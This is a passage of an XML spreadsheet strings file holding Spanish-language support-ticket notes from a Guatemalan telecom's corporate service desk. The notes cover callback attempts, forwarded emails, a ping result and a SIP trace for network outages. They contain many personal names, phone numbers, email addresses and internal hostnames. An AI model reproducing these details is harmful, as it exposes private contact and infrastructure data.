    <t>MARIO GUERRA INDICA QUE EL PERSONAL TECNCIO SE COMUNIQUE CON SU PERSONA AL ESTAR EN LAS INSTALACIONES PARA QUE EL LOS RETROALIMENTE DEL CASO</t>
  </si>
  <si>
    <t>TABLA DE ESCALAMIENTO PLANTA EXTERNA REGION METROSUR				
	WO OPEN                        		&lt;&lt;	8:43
1/4	ELMER FLORES	58260888		10:43:00
2/4	ALDO DIAZ	58261057	3 HORAS	11:43:00
3/4	RENE AGUSTIN	58261183	5 HORAS	13:43:00
4/4	RODOLFO MORALES	58261609	6 HORAS	14:51:00</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. MARIO GUERRA 55566865 NO CONTESTO IVR ENVIA A BUZON, ID: 3001387779.</t>
  </si>
  <si>
    <t>SE LLAMA A NÚMERO: 55566865
ID DE LLAMADA:     3001598368  3001598551
NOMBRE DEL CLIENTE: MARIO GUERRA
CLIENTE NO RESPONDE SE LLAMARA LUEGO</t>
  </si>
  <si>
    <t>F4584616</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. EDUARDO JUB 32847773 CONTINUA REALIZANDO PRUEBAS, SE LLAMARA EN UNA HORA. ID: 3001652593.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. EDUARDO JUB 32847773 SE LE INFORMA QUE YA PUEDE REALIZAR PRUEBAS YA QUE SE REPARO LA FIBRA OPTICA, INFORMA QUE REALIZARA PRUEBAS EN 30 MINS ID: 3001614556.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDUARDO HUB 32847773 PARA SOLICITAR DATOS DE VISITA TECNICA
-ID 3001445081
NOMBRE DEL CLIENTE: IGLESIA DE JESUCRISTO SUD
UBICACIÓN:CALLE PRINCIPAL ALDEA SACSUHA, SANTA CATALINA LA TINTA, ALTA VERAPAZ
CONTACTO EN SITIO: EDUARDO HUB - 32847773
HORARIO DE ATENCION:7:00 - 16:00
GESTIÓN DE PERMISOS: DATOS DE PERSONAL TECNICO - DGUAYO2012@HOTMAIL.COM</t>
  </si>
  <si>
    <t>F4584618</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAMUEL GONZALEZ-55959062  ##ENVIA A BUZON 1 VEZ
SE LLAMA A CLIENTE LISA ESTEFANIE CARRANZA-55768083/56956009  ##  WENDY-- ## VALIDA SERVICIO- COMETNA QEU ERA PROBLEMA DE SU PBX ##SE PEROCEDE AL CIERRE##VIVO</t>
  </si>
  <si>
    <t>SAMUEL GONZALEZ-55959062  SE LE COMENTA QUE CLIENTE NO TIENE LLAMAADAS ENTRANTES,SALIENTES NI ENTRE EXTENSIONES, TELEFONO TOTALMENTE MUERTO ##CLIENTE REALIZA PRUEBA Y CONFIRMA QUE NO TIENN SERVICIO ENTRE EXTENSIONES ## INDICA QUE VALIDARA SU PBX Y QUE NO SE CIERRE TICKET + QUE SE LE LLAME TIPO 3 PM## PARA VERIFICAR SI LO PUDO SOLVENTAR O NECESITA ALGUN TIPO DE APOYO-
3001365432
COLA:
NOMBRE: A: 55959062
NÚMERO: 011 50255959062
DURACIÓN: 0:02:56
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: +50255959062
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 31/05/2022 12:44:15</t>
  </si>
  <si>
    <t>LISA ESTEFANIE CARRANZA-55768083  REVISA EQUIPOS, NO UBICA PBX PERO COMENTA QUE NO TIENE PERMISOS PARA APLICAR REINICIO ## SE ESCALA CON SU CENTRAL ##
3001362268
COLA:
NOMBRE: A: 55768083
NÚMERO: 55768083
DURACIÓN: 0:08:16
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55768083
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 31/05/2022 12:41:18</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LISA ESTEFANIE CARRANZA-55768083  SE TIENE EN LINEA ## COMENTA QUE NO TIENE LLAMADAS, ENTRANTES, SALIENTES NI ENTRE EXTENSIONES + QUE AHORITA SE DIRIGE A VERIFICAR SI SU PBX ESTA ENCENDIDA ##
3001362268
COLA:
NOMBRE: A: 55768083
NÚMERO: 55768083
DURACIÓN: 0:01:47
ESTADO: CONECTADA
DETALLES: 55768083
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 31/05/2022 12:34:41</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAMUEL GONZALEZ-55959062 MENCIONA QUE AUN ESTAN REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMADA PARA LAS  17:30
-ID 3001407487</t>
  </si>
  <si>
    <t>F4584627</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 66790245 NO RESPONDE, SE INTENTARA LUEGO
-ID 300137382</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 66790245 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001369883</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 47906576  MENCIONA QUE YA NO TRABAJA PARA LA EMPRESA
-ID 3001369309</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER REYES 45787911 MENCIONA QUE NO CUENTA CON OTRO NUMERO POR LO QUE SOLICITA SE TRATE DE LLAMAR AL NUMERO  66790245
-ID 3001371117</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER ANIBAL REYES AL 45787911 SE BRINDA RETROALIMENTACION A CLIENTE **
ID 3001390744
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSUE MARROQUIN AL 47906576  - 66790245NO RESPONDE **
ID 3001390236 - 3001390476
**</t>
  </si>
  <si>
    <t>F4584633</t>
  </si>
  <si>
    <t>***---  SE ENVÍA CORREO A CL EN LA OTRA COLA DE CORREO REALIZANDO LA CONSULTA SOBRE EL UBIQUITI   --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: JUEVES, 2 DE JUNIO DE 2022 02:27
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; ERICK SANCHEZ &lt;ERICK.SANCHEZS@SOMOSCMI.COM&gt;; ANA CECILIA POZUELOS PACHECO &lt;ANA.POZUELOS@CLARO.COM.GT&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; CARLOS ESTUARDO LEIVA RAMIREZ &lt;CARLOSE.LEIVA@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; BELTER FRANCISCO AGUIRRE TELLEZ &lt;BELTER.AGUIRRE@SOMOSCMI.COM&gt;; CMIA_REDES &lt;CMIA_REDES@SOMOSCMI.COM&gt;; C687-GT@CAMPERO.COM; WERNER DENIS HERNANDEZ POP &lt;WERNER.HERNANDEZ@SOMOSCMI.COM&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;
ASUNTO: RE: TTK F4584633 // 671900138 // C687
ESTIMADO SR. REYES.
                CONTINUANDO CON EL SEGUIMIENTO, PERSONAL DEL CNOC CLARO CONFIRMA LA INSTALACIÓN DEL EQUIPO PROVISIONAL Y RESPONDE CON SALIDA A INTERNET.
SIN EMBARGO VEMOS QUE SU EQUIPO UBIQUITI NO SE CONECTA, NOS PUEDEN CONFIRMAR SI EL MISMO SE ENCUENTRA CON CONF DHCP Ó ALGUNA IP ESPECIFICA.
QUEDAMOS AL PENDIENTE Y CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 31 DE MAYO DE 2022 14:51
PARA: CARLOS ESTUARDO LEIVA RAMIREZ &lt;CARLOSE.LEIVA@CLARO.COM.GT&gt;; WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: TTK F4584633 // 671900138 // C687
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER REYES 45787911 MENCIONA QUE ESTARA RESPONDIENDO EL CORREO CUANDO YA SE TENGAN GESTIONADOS LOS PERMISOS
-ID 3001402690</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE ESPECIFICANDO LOS DATOS QUE NECESITAMOS YA QUE EL CLIENTE DEBE PROPORCIONAR APOYO CON SU EQUIPO INTERNO PARA CONETAR EL WA CONFIGURADO
DE: VELDIN JANITZIO PALENCIA FLORES &lt;VELDIN.PALENCIA@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 1 DE JUNIO DE 2022 16:43
PARA: WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; ERICK SANCHEZ &lt;ERICK.SANCHEZS@SOMOSCMI.COM&gt;
ASUNTO: RE: GESTION DE PERMISOS | 671900138T | CMI - POLLO CAMPERO | C687 - 1 AVENIDA 7-62 ZONA 2 BARRIO SAN LUCAS LOCAL 23 Y 24 C.C. PRADERA PALIN ESCUINTLA
BUENAS TARDES , HACEMOS DE SU CONOCIMIENTO, QUE NUESTRO PERSONAL INSTALO UN EQUIPO DE RESPALDO 3G, PARA LEVANTAR EL SERVICIO DE INTERNET, PERO VEMOS QUE SU EQUIPO UBIQUITI NO SE CONECTA, NOS PUEDEN CONFIRMAR SI EL MISMO SE ENCUENTRA CON CONF DHCP Ó ALGUNA IP ESPECIFICA.
AGRADECEMOS SU CONFIRMACIÓN.
SALUDOS</t>
  </si>
  <si>
    <t>##SE REVISA COLA DE CORREOS PARA QUE EL CLIENTE CONFIRME COMO ESTA LA CONFIGURACION DE SU UBIQUITI DE SUS RED LAN. AUN NO SE TIENE RESPUESTA##
ASUNTO:      TTK F4584633 // 671900138 // C687</t>
  </si>
  <si>
    <t>###SE REVISA COLA DE CORREOS PARA QUE EL CLIENTE CONFIRME COMO ESTA LA CONFIGURACION DE SU UBIQUITI DE SUS RED LAN. AUN NO SE TIENE RESPUESTA##
ASUNTO:      TTK F4584633 // 671900138 // C687</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE SE LE EXPLICA QUE POR TEMAS DE PERMISOS EN CENTRO COMERCIAL NO ES POSIBLE RESTABLECER EL SERVICIO, SE ESTARA COLOCANDO UN WORKARROUD EL DIA DE MAÑANA, SE ESTARA PLATICANDO CON PLANTA INTERNA PARA COLOCAR EL EQUIPO PROVISIONALMENTE
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 31 DE MAYO DE 2022 18:18
PARA: WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;; ERICK SANCHEZ &lt;ERICK.SANCHEZS@SOMOSCMI.COM&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; ANA CECILIA POZUELOS PACHECO &lt;ANA.POZUELOS@CLARO.COM.GT&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; CARLOS ESTUARDO LEIVA RAMIREZ &lt;CARLOSE.LEIVA@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; BELTER FRANCISCO AGUIRRE TELLEZ &lt;BELTER.AGUIRRE@SOMOSCMI.COM&gt;; CMIA_REDES &lt;CMIA_REDES@SOMOSCMI.COM&gt;; C687-GT@CAMPERO.COM &lt;C687-GT@CAMPERO.COM&gt;; WERNER DENIS HERNANDEZ POP &lt;WERNER.HERNANDEZ@SOMOSCMI.COM&gt;
ASUNTO: RE: TTK F4584633 // 671900138 // C687
BUENA TARDE
ESTIMADO CLIENTE DANDO SEGUIMIENTO AL INCIDENTE REPORTADO, LE COMENTAMOS QUE EL DÍA 01/06/22 A LAS 8:30 AM SE ESTARÁ COLOCANDO UN SERVICIO PROVISIONAL, SE VALIDA EN INCIDENTES ANTERIORES QUE NO ES POSIBLE RESTABLECER EL SERVICIO YA QUE EN CENTRO COMERCIAL REALIZARON REMODELACIÓN DE TECHO Y POR TEMAS DE GARANTÍA NO PERMITEN EL INGRESO A PERSONAL TÉCNICO, TAMBIÉN SE ESTÁ EVALUANDO EN CAMBIO A LA RED DE CLARO.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4584637</t>
  </si>
  <si>
    <t>SE HABLO CON CLIENTE LOURDES SEGURA E INDICÓ QUE EQUIPO ESTÁ ENCENDIDO PERO PRESENTA ALARMA DE LOS EN ROJO PARPADEANDO, SE SOLICITARÁ VISITA TECNICA. LLAMADA DESDE VIVO.</t>
  </si>
  <si>
    <t>F4584652</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS MORENO 78429830 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001405613</t>
  </si>
  <si>
    <t>SE CONVERSA CON JOSUE HERRERA EJECUTIVO, SE LE INDICA QUE NO HAY EQUIPOS CONECTADOS E INDICA QUE SOLO DESEABA VALIDAR QUE SE TUVIERA ACCESO AL CPE YA QUE DE MOMENTO EL CLIENTE NO TIENE EQUIPOS CONECTADOS Y AUTORIZA CIERRE DE TICKET
3001410424
COLA:
NOMBRE: DE: LUVY ESAU SANDOVAL MATEO
NÚMERO: 7753
DURACIÓN: 0:04:35
ESTADO: DESCONECTADO [ÚLTIMO PARTICIPANTE DE CONFERENCIA]
DETALLES: 7753
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 31/05/2022 15:16:50</t>
  </si>
  <si>
    <t>F4584659</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JAIRO ROBERTO AL 4605 1665 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
ID 3001382446
**</t>
  </si>
  <si>
    <t>F4584662</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARCO HERNANDEZ  AL 99202007 NO RESPONDE ENVIA A BUZON SE
INTENTARA LUEGO **
ID 3001386011
**</t>
  </si>
  <si>
    <t>F4584667</t>
  </si>
  <si>
    <t>SE VALIDA SERVICIO ACTIVO COMERCIAL YA REALIZO NUEVAMENTE RECARGA DE PAQUETE DEL SERVICIO---
INFO: THE DEVICE IS NOT ENABLED WITH SECURE BOOT, PLEASE ENABLE IT.
&lt;GNCYGTG2N2D4A05A03EIM9&gt;PIN -VPN-INSTANCE INNOVA_DATOS 10.255.170.6
  PING 10.255.170.6: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.255.170.6: BYTES=56 SEQUENCE=1 TTL=255 TIME=17 MS
    REPLY FROM 10.255.170.6: BYTES=56 SEQUENCE=2 TTL=255 TIME=16 MS
    REPLY FROM 10.255.170.6: BYTES=56 SEQUENCE=3 TTL=255 TIME=19 MS
    REPLY FROM 10.255.170.6: BYTES=56 SEQUENCE=4 TTL=255 TIME=16 MS
    REPLY FROM 10.255.170.6: BYTES=56 SEQUENCE=5 TTL=255 TIME=18 MS
  --- 10.255.170.6 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 16/17/19 MS
&lt;GNCYGTG2N2D4A05A03EIM9&gt;</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A SOLICITUD DE CLIENTE &gt;&gt; CLIENTE CONSUMIO LA TOTALIDAD DE SU PAQUETE--
INNOVA OUTSOURSING, S.A. - 863400146T</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARILIN AL 31633112 - 23049696  OPC. 1 CONTESTA EL SEÑOR RENATO CONFIRMA SERVICIO ESTABLE Y OPERATIVO || AUTORIZA CIERRE DE TICKET **
ID 3001458640 - 3001458841
**</t>
  </si>
  <si>
    <t>F4584682</t>
  </si>
  <si>
    <t xml:space="preserve">
SE CONVERSA CON CLIENTE, INDIA QUE HUBO CORTE DE ENERGIA EN SITO PERO YA SE RESTABLECIÓ Y AUTORIZA  CIERRE DE CASO.
3001374937
COLA:
NOMBRE: A: 58064113
NÚMERO: 58064113
DURACIÓN: 0:01:09
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 58064113
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 31/05/2022 13:10:03</t>
  </si>
  <si>
    <t>F4584684</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VICTOR RENATO AL 58064113 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
ID 3001383210
**</t>
  </si>
  <si>
    <t>F4584718</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE SANDRA  GARCIA 40086820 NO NOS CONTESTA, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE REALIZAN PRUEBAS CON CLIENTE, CLIENTE INDICA QUE EL DIA DE HOY HUBIERON VARIOS APAGONES CERCA DE LA ZONA DE LAS INSTALACIONES, INDICA QUE YA REINICIARON LA PBX PERO EL SERVICIO NO LEVANTA, SE LE COMENTA QUE SE RALIZARON PRUEBAS DE TRAZA Y LA LIBERACION DE LA LLAMADA LA ESTA DANDO LA PBX SERIA DE REINICIAR NUEVAMENTE LA PBX PARA VALIDAR QUE NO ESTE BLOQUEDA, SIN EMBARGO CLIENTE COMENTA QUE SE ENVIE PERSONAL TECNICO PARA CERTIFICAR EL SERVICIO Y CONFIRMAR QUE NO HAYA PROBLEMAS A NIVEL DE CLARO, POSIBLEMENTE LA PBX DEL CLIENTE SE HAYA QUEMADO POR TANTOS BAJONES DE LUZ SIN EMBARGO ELLA NECESITA CONFIRMAR QUE A NIVEL DE CLARO ESTE TODO BIEN, CLIENTE INDICA QUE NO ES NECESARIO TRAMITAR PERMISOS Y QUE SE RETIRA A LAS 17:00 HRS</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN INDICA QUE TIENE DAÑO EN LA LINEA
SE REALIZA TRAZADO, SE TIENE LA SIGUIENTE LIBERACION
SIP/2.0 502 BAD GATEWAY
VIA: SIP/2.0/UDP 10.16.246.231:5060;BRANCH=Z9HG4BKYXWV91GWIXXYLX4VL9KG9JJJJT18189;RECEIVED=10.16.246.231
FROM: &lt;SIP:24148921@IMSHWI.CLARO.COM.GT;USER=PHONE&gt;;TAG=SBC040582L1RXGV-CC-9
TO: &lt;SIP:+50224245600@10.16.246.231:5060;TRANSPORT=UDP;USER=PHONE&gt;;TAG=AS4930E9CB
CALL-ID: ASBCA0XI3GLRJ128X3ZZ8JG1X3AX30AHZ22J@ATS.CEATS1.IMSHWI.CLARO.COM.GT.9
CSEQ: 1 INVITE
SERVER: AETHRA TELECOMMUNICATIONS PBX
ALLOW: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO, UPDATE, PRACK
CONTENT-LENGTH: 0
REASON: Q.850;CAUSE=27;TEXT="DESTINATION OUT OF ORDER"
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
L1: U 31/05/2022 16:48:14:890 VOIP:
&lt;&lt;&lt; SIP RX FROM 10.16.246.231:5060:
ACK TEL:+50224245600 SIP/2.0
VIA: SIP/2.0/UDP 10.16.246.231:5060;BRANCH=Z9HG4BKYXWV91GWIXXYLX4VL9KG9JJJJT18189;RECEIVED=10.16.246.231
CALL-ID: ASBCA0XI3GLRJ128X3ZZ8JG1X3AX30AHZ22J@ATS.CEATS1.IMSHWI.CLARO.COM.GT.9
FROM: &lt;SIP:24148921@IMSHWI.CLARO.COM.GT;USER=PHONE&gt;;TAG=SBC040582L1RXGV-CC-9
TO: &lt;SIP:+50224245600@10.16.246.231:5060;TRANSPORT=UDP;USER=PHONE&gt;;TAG=AS4930E9CB
CSEQ: 1 ACK
MAX-FORWARDS: 70
CONTENT-LENGTH: 0
&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;</t>
  </si>
  <si>
    <t>F4584722</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DANIEL ALBERTO GARCÍA AL 4583 6146 SOLICITA QUE SE LE LLAME EN 5 MIN PARA CONFIRMAR **
ID 3001383692
**</t>
  </si>
  <si>
    <t>F4584731</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A COLA DE CORREOS DE PERSONAL COMERCIAL-
MPLS - PROBLEMA CON LENTITUD. ID673000007T - COFIÑO STAHL</t>
  </si>
  <si>
    <t>F4584734</t>
  </si>
  <si>
    <t>INICIO 11:18
SE REVISA COLA DE CORREOS, AUN SIN RESPUESTA DE PARTE DEL CLIENTE, SE LE LLAMA A CARLOS CHENG 43246230 / ID: 3001607719
CLIENTE COMENTA QUE NO ES NECESARIA LA CERTIFICACION POR AHORA, SOLICITA SE DEJE EL SERVICIO EN MONITOREO HASTA LAS 18:00 HRS DE HOY 01/06 DEBIDO A QUE EL SERVICIO YA LE ESTA FUNCIONANDO BIEN, SE NOTIFICA A WAGNER.POLANCO VIA SKYPE PARA EL CAMBIO DE ETAPA
FIN: 11:49</t>
  </si>
  <si>
    <t>F4584739</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE VINICIO 58260753 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001415628</t>
  </si>
  <si>
    <t>F4584747</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MELIZA LÓPEZ 34042338  NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 3001616679
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MELIZA LÓPEZ 34042338  NO RESPONDE, SE INTENTARA LUEGO
-ID 3001607414 - 3001604640</t>
  </si>
  <si>
    <t>SE LLAMA A LAURA MELIZA LÓPEZ 34042338 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001600883 - 3001601182</t>
  </si>
  <si>
    <t>SE LLAMA A LAURA MELIZA LÓPEZ 34042338 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001417081 - 3001417816</t>
  </si>
  <si>
    <t>SE LLAMA A LAURA MELIZA LÓPEZ 34042338 MENCIONA QUE CLIENTE YA NO ESTA LABORANDO POR LO QUE SOLICITA LLAMADA PARA MAÑANA A PARTIR DE LAS 8:30
-ID 3001433791</t>
  </si>
  <si>
    <t>SE LLAMA A  LAURA MELIZA LÓPEZ  34042338 SIGUE SIN RESPONDER
-ID 3001624977 - 3001625301</t>
  </si>
  <si>
    <t>*/*/*/CLIENTE AUTORIZA CIERRE Y SE LE RESPONDE*/*/*/SE NOTIFICA A GESTOR WAGNER.POLANCO PARA QUE PROCEDA AL CIERRE*/*/*/
DE: KANDY KRYSTINA CORONADO RAMON
ENVIADO EL: MIÉRCOLES, 1 DE JUNIO DE 2022 12:49
PARA: JOSUÉ DAVID CANÍZ GUERRERO &lt;JCANIZ@TSE.ORG.GT&gt;; LAURA MELIZA LOPEZ CHACON &lt;LAURAM.LOPEZ@CLARO.COM.GT&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; DAVID ANDREE LARRAÑAGA CHINCHILLA &lt;DAVID.LARRANAGA@CLARO.COM.GT&gt;; MARLEN ESTEFFANY FLORES MORALES &lt;MARLEN.FLORES@CLARO.COM.GT&gt;
ASUNTO: RE: FALLA MASIVA TSE
BUENAS TARDES JOSUÉ,
            AGRADECEMOS POR SU AUTORIZACIÓN, HEMOS PROCEDIDO CON EL CIERRE DE LOS TICKETS.
TICKET
SD1130798
SD1130799
SD1130801
SD1130805
SD1130806
SD1130809
SD1130811
SD1130813
SD1130815
SD1130817
SD1130819
SD1130832
SD1130833
SD1130834
SD1130821
SD1130835
SD1130837
SD1130842
CUALQUIER CONSULTA ESTAMOS A LA ORDEN.
--------------------------------------------------------------------
DE: JOSUÉ DAVID CANÍZ GUERRERO [MAILTO:JCANIZ@TSE.ORG.GT]
ENVIADO EL: MIÉRCOLES, 1 DE JUNIO DE 2022 12:35
PARA: LAURA MELIZA LOPEZ CHACON &lt;LAURAM.LOPEZ@CLARO.COM.GT&gt;
CC: KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; DAVID ANDREE LARRAÑAGA CHINCHILLA &lt;DAVID.LARRANAGA@CLARO.COM.GT&gt;; MARLEN ESTEFFANY FLORES MORALES &lt;MARLEN.FLORES@CLARO.COM.GT&gt;
ASUNTO: RE: FALLA MASIVA TSE
FAVOR CERRAR ESTOS TICKETS!
CORDIALMENTE
ING. JOSUÉ CANÍZ
2378 3900 EXT. 12344</t>
  </si>
  <si>
    <t>SE LLAMA A  LAURA MELIZA LÓPEZ 34042338 MENCIONA QUE EL CLIENTE EN ESTE MOMENTO ESTA EN UNA REUNION POR LO QUE SOLICITA LLAMADA PARA LAS 11:00
-ID 3001544746</t>
  </si>
  <si>
    <t>F4584750</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MELIZA LÓPEZ 34042338  NO RESPONDE, SE INTENTARA LUEGO
-ID 3001617412
**</t>
  </si>
  <si>
    <t>F4584751</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  SHILA RAMIREZ AL 30895280 SOLICITA QUE SE LE LLAME EN 10 MIN NUEVAMENTE**
ID 3001584837
**</t>
  </si>
  <si>
    <t>SE TIENE CORREO DE CLIENTE AUTORIZANDO LOS PERMISOS
DE: SHEYLA RAMIREZ &lt;GTH@DAR.EDU.GT&gt;
ENVIADO: MARTES, 31 DE MAYO DE 2022 15:24
PARA: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; LILIAN RAMIREZ &lt;ASISTENTE@DAR.EDU.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE PERMISOS || SERVICIO TECNICO DE MANTENIMIENTO DE AVIACION S.A. || F4584751
BUENAS TARDES ACCESOS AUTORIZADOS, QUEDO AL PENDIENTE.
SALUDOS,
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 30895280 MENCIONA QUE SE RETIRAN A LAS 16:00 HRS POR LO QUE SOLICITA VISITA PARA MAÑANA A LAS 8:00 HRS
-ID 3001422513</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SHILA RAMIREZ 30895280 REPONDE LILIAN QUIEN SOLICITA LOS DATOS DE PERSONAL TECNICO AL CORREO
--  ASISTENTE@DAR.EDU.GT --
-ID 3001409945</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  SHILA RAMIREZ AL 30895280 INDICA QUE POR EL MOMENTO ESTA ESTABLE PERO SOLICITA QUE SE LE ENVIE CORREO CON PRUEBAS || SE NOTIFICA A GESTOR   **
ID 3001589782
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 30895280 RESPONDE LILIAN MENCIONA QUE ESTARA RESPONDIENDO EL CORREO CON LOS PERMISOS
-ID 3001412736</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 31 DE MAYO DE 2022 15:16
PARA: ASISTENTE@DAR.EDU.GT &lt;ASISTENTE@DAR.EDU.GT&gt;; GTH@DAR.EDU.GT &lt;GTH@DAR.EDU.GT&gt;
